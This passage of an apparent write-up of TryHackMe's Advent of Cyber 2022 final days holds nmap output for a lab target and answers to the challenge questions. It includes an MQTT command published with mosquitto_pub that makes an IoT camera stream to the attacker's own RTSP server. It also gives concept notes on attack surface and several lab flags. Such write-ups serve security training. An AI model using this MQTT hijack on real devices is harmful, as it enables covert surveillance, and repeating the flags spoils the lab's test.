|     Server: WebSockify Python/3.8.10
|     Date: Thu, 22 Dec 2022 05:37:25 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10#1883/tcp open  mosquitto version 1.6.9 syn-ack
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/clients/total: 4
|     $SYS/broker/clients/active: 4
|     $SYS/broker/load/publish/received/15min: 2.03
|     $SYS/broker/load/sockets/5min: 0.88
|     $SYS/broker/load/bytes/received/1min: 276.74
|     $SYS/broker/store/messages/bytes: 180
|     $SYS/broker/publish/messages/sent: 70
|     $SYS/broker/load/connections/15min: 0.32
|     $SYS/broker/uptime: 374 seconds
|     $SYS/broker/publish/messages/received: 37
|     $SYS/broker/bytes/sent: 2735
|     $SYS/broker/load/publish/sent/15min: 4.21
|     $SYS/broker/load/bytes/sent/1min: 1482.40
|     $SYS/broker/publish/bytes/received: 740
|     $SYS/broker/heap/maximum: 57352
|     $SYS/broker/clients/connected: 4
|     $SYS/broker/load/publish/received/1min: 6.19
|     $SYS/broker/publish/bytes/sent: 897
|     $SYS/broker/load/messages/sent/1min: 42.00
|     $SYS/broker/load/connections/5min: 0.65
|     $SYS/broker/version: mosquitto version 1.6.9
|     $SYS/broker/load/bytes/sent/15min: 165.49
|     $SYS/broker/store/messages/count: 39
|     $SYS/broker/subscriptions/count: 4
|     $SYS/broker/retained messages/count: 42
|     $SYS/broker/load/bytes/received/15min: 83.09
|     $SYS/broker/load/sockets/15min: 0.43
|     $SYS/broker/load/publish/sent/5min: 10.76
|     #device/init: FFISRRN3EAJUZSUVK1QB
|     $SYS/broker/load/messages/received/15min: 3.46
|     $SYS/broker/load/messages/received/5min: 7.36
|     $SYS/broker/messages/received: 63
|     $SYS/broker/messages/sent: 96
|     $SYS/broker/clients/maximum: 4
|     $SYS/broker/bytes/received: 1521
|     $SYS/broker/heap/current: 56872
|     $SYS/broker/load/bytes/received/5min: 175.57
|     $SYS/broker/load/connections/1min: 1.26
|     $SYS/broker/load/sockets/1min: 1.41
|     $SYS/broker/load/publish/sent/1min: 36.35
|     $SYS/broker/load/messages/sent/15min: 5.64
|     $SYS/broker/messages/stored: 39
|     $SYS/broker/load/messages/sent/5min: 13.84
|     $SYS/broker/load/messages/received/1min: 11.85
|     $SYS/broker/load/publish/received/5min: 4.28
|_    $SYS/broker/load/bytes/sent/5min: 426.78
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.93%I=7%D=12/22%Time=63A3ED14%P=x86_64-pc-linux-gnu%r(Get
SF:Request,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x2
SF:0WebSockify\x20Python/3\.8\.10\r\nDate:\x20Thu,\x2022\x20Dec\x202022\x2
SF:005:37:24\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html;
SF:charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PUB
SF:LIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x
SF:20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Con
SF:tent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head>
SF:\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20
SF:response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20405
SF:</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20A
SF:llowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expla
SF:nation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20t
SF:his\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOptio
SF:ns,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\nS
SF:erver:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Thu,\x2022\x20Dec\x
SF:202022\x2005:37:25\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20t
SF:ext/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20HT
SF:ML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\
SF:x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-eq
SF:uiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x
SF:20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>
SF:Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20cod
SF:e:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsupport
SF:ed\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p
SF:>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20S
SF:erver\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x2
SF:0\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1. What port is Mosquitto running on?

Ans: 1883

2. Is the device/init topic enumerated by Nmap during a script scan of all ports? (y/n)

I Highlighted the Line which Enumerates the device/init

If you cannot see the Enumeration. Perform the Given Command

nmap -sC -sV -p- <Target IP> -vv --min-rate 1500

Ans: y

3. What Mosquitto version is the device using?

Ans: 1.6.9

4. What flag is obtained from viewing the RTSP stream?

In case You Need mosquitto_sub, you can install it via the Command, But the Attack box has the Mosquitto clients installed

sudo apt install mosquitto-clients

1. We Have to Subscribe to the device/init topic to enumerate the device and obtain the device ID

2. Let’s Start the RTSP Server with the docker

sudo docker run --rm -it --network=host aler9/rtsp-simple-server

─$ sudo docker run --rm -it --network=host aler9/rtsp-simple-server  
Unable to find image 'aler9/rtsp-simple-server:latest' locally
latest: Pulling from aler9/rtsp-simple-server
d7c47958dda1: Pull complete 
Digest: sha256:44ce06f758a74f316ae4d912706c5212af2fb4765137e119ff689c5ec327dc94
Status: Downloaded newer image for aler9/rtsp-simple-server:latest
2022/12/22 06:06:45 INF rtsp-simple-server v0.21.0
2022/12/22 06:06:45 INF [RTSP] listener opened on :8554 (TCP), :8000 (UDP/RTP), :8001 (UDP/RTCP)
2022/12/22 06:06:45 INF [RTMP] listener opened on :1935
2022/12/22 06:06:45 INF [HLS] listener opened on :8888
2022/12/22 06:06:45 INF [WebRTC] listener opened on :8889

3. Now publish the Payload using the Following Command

mosquitto_pub -h <THM-Machine-IP> -t device/<Device-ID>/cmd -m """{"cmd":"10","url":"rtsp://<Your_Machine-IP>:8554/abcdefghijk"}"""

4. You can view what is being sent to the server by running VLC and opening the server path of the locally hosted RTSP server

vlc rtsp://127.0.0.1:8554/abcdefghijk

Ans: THM{UR_CAMERA_IS_MINE}

An attack vector is a tool, technique, or method used to attack a computer system or network. If we map the attack vectors to the physical world, attack vectors would be the weapons an adversary uses, like, swords, arrows, hammers, etc. A non-exhaustive list of examples of attack vectors in cybersecurity includes the following:

• Phishing emails; Deceptive emails that are often impersonating someone and asking the victim to perform an action that compromises their security.
• Denial of Service (DoS) or Distributed Denial of Service (DDoS) attacks; Sending so many requests to a website or web application that it reaches its limits and can no longer serve legitimate requests.
• Web drive-by attacks; Flaws in web browsers that compromise the security of the victim by merely visiting a website.
• Unpatched Vulnerability exploitation; A flaw in the internet-facing infrastructure, such as the web server or the network interface, that is exploited to take control of the infrastructure.

The attack surface is the surface area of the victim of an attack that can be impacted by an attack vector and cause damage. Taking forward our example of the physical world, the attack surface will include the unarmoured body of a soldier, which an attack of a sword, an arrow, or a hammer, etc., can damage. In cybersecurity, the attack surface will generally contain the following:

• An email server that is used for sending and receiving emails.
• An internet-facing web server that serves a website to visitors.
• End-user machines that people use to connect to the network.
• Humans can be manipulated and tricked into giving control of the network to an attacker through social engineering.

1. Follow the instructions in the attached static site to help McSkidy reduce her attack surface against attacks from the Yeti. Use the flag as an answer to complete the task.

Ans: THM{4TT4CK SURF4C3 R3DUC3D}

1. Please help us improve by answering this 5-minute survey. Make sure to grab the flag before you click “Submit”!

THM{AoC2022!thank_you!}

Ah, what a month! As McSkidy watched Santa’s sleigh take off, loaded with gifts, she sighed with relief.
We did it!

Looking around the workshop, she could see Santa’s SOC Team working on their tasks.
Some were setting up additional defenses, some were implementing new security policies,
and some were trying out new skills (and hats!) too.

There are some things McSkidy can’t see, but would be vital for you to know.

The Bandit Yeti has left the area and returned to his lair, defeated for now.

If we could look inside his planning room, we’d see the beginnings
of a new scheme, but let’s not worry about that today!

As McSkidy returned to her office, she looked at her desk,
where just 24 days ago, an evil-looking card was placed.
Now that spot was occupied by a scroll with a massive security to-do list.

They all worked hard to clear as many items as possible, but many remain.
Security is never done!

However, with Santa in the air, she could cross out “Save Christmas” off the list. Success!

McSkidy and all the Elves from Santa’s Security Team thank you for your help this year.
They promised to call you if they get into trouble in 2023!

TryHackMe , tryhackme , THM , thm , Advent of Cyber 2022 , advent of cyber 2022 , advent of cyber 4 , advent of cyber 2022 all answers , Advent of Cyber 2022 All Answers , advent of cyber 2022 day 1 , advent of cyber 2022 day 1 , advent of cyber 2022 day 2, advent of cyber 2022 day 3, advent of cyber 2022 day 4 , advent of cyber 2022 day 5, advent of cyber 2022 day 6, advent of cyber 2022 day 7, advent of cyber 2022 day 8, advent of cyber 2022 day 9, advent of cyber 2022 day 10 , advent of cyber 2022 day 11 , advent of cyber 2022 day 12 , advent of cyber 2022 day 13, advent of cyber 2022 day 14 , advent of cyber 2022 day 15, advent of cyber 2022 day 16, advent of cyber 2022 day 17, advent of cyber 2022 day 18, advent of cyber 2022 day 19, advent of cyber 2022 day 20 , advent of cyber 2022 day 21 , advent of cyber 2022 day 22 , advent of cyber 2022 day 23 , advent of cyber 2022 day 24 , cyberw1ng , karthikeyan nagaraj , karthikeyannagaraj , karthikeyan , cyber w1ng , cyberwing